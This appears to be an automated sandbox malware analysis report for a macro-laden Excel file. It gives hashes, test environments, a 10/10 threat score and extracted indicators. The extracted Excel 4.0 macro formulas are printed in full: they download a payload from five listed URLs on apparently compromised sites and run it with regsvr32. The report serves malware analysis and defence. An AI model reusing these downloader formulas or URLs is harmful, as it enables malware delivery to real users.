General
-
Target
af3a4e74541baa2d8367812bc5070ddeaee770024b61a8180124aec05aeb07ef
-
Size
91KB
-
Sample
241120-yyplwasmf1
-
MD5
c6d061442f190c492b5a264592e23276
-
SHA1
06b9815395a8818120bdce01858b0755f44b3c5c
-
SHA256
af3a4e74541baa2d8367812bc5070ddeaee770024b61a8180124aec05aeb07ef
-
SHA512
e29869d6e0f8352f3ce6903b2b7c9a8651d1b0725aee153f4624d27d4a0094c50cd6019a940dd1a2b9171815669ba93b6c9ab26c8e02e5be2fd857c0958df168
-
SSDEEP
1536:NdNlX2L2nyV+ns1BVi/IEh2hx0Lx3bKhllGGx0vKCEjdQjqEk+xX0bIS:Nd32KyVEoBo6hKb4llGsQjbxXS
Behavioral task
behavioral1
Sample
af3a4e74541baa2d8367812bc5070ddeaee770024b61a8180124aec05aeb07ef.xlsm
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
af3a4e74541baa2d8367812bc5070ddeaee770024b61a8180124aec05aeb07ef.xlsm
Resource
win10v2004-20241007-en
Malware Config
Extracted
https://oroanddentalcarecenter.com/wp-includes/0JRI2sOVpNkDhAe/
https://dev.subs2me.com/wp-includes/EMa/
https://imagecarephotography.com/wp-includes/KVRvUyat0qqK0W/
https://yanapiri.com/upeatv/9IZP9RfbH338pFPI/
https://gurmitjaswal.ca/frer-hate/LW37erwSAhgU/
-
formulas
=FORMULA() =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://oroanddentalcarecenter.com/wp-includes/0JRI2sOVpNkDhAe/","..\dw1.ocx",0,0) =IF('EFWFSFG'!D15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://dev.subs2me.com/wp-includes/EMa/","..\dw1.ocx",0,0)) =IF('EFWFSFG'!D17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://imagecarephotography.com/wp-includes/KVRvUyat0qqK0W/","..\dw1.ocx",0,0)) =IF('EFWFSFG'!D19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://yanapiri.com/upeatv/9IZP9RfbH338pFPI/","..\dw1.ocx",0,0)) =IF('EFWFSFG'!D21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://gurmitjaswal.ca/frer-hate/LW37erwSAhgU/","..\dw1.ocx",0,0)) =IF('EFWFSFG'!D23<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\dw1.ocx") =RETURN()
Extracted
https://oroanddentalcarecenter.com/wp-includes/0JRI2sOVpNkDhAe/
https://dev.subs2me.com/wp-includes/EMa/
https://imagecarephotography.com/wp-includes/KVRvUyat0qqK0W/
Targets
-
-
Target
af3a4e74541baa2d8367812bc5070ddeaee770024b61a8180124aec05aeb07ef
-
Size
91KB
-
MD5
c6d061442f190c492b5a264592e23276
-
SHA1
06b9815395a8818120bdce01858b0755f44b3c5c
-
SHA256
af3a4e74541baa2d8367812bc5070ddeaee770024b61a8180124aec05aeb07ef
-
SHA512
e29869d6e0f8352f3ce6903b2b7c9a8651d1b0725aee153f4624d27d4a0094c50cd6019a940dd1a2b9171815669ba93b6c9ab26c8e02e5be2fd857c0958df168
-
SSDEEP
1536:NdNlX2L2nyV+ns1BVi/IEh2hx0Lx3bKhllGGx0vKCEjdQjqEk+xX0bIS:Nd32KyVEoBo6hKb4llGsQjbxXS
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-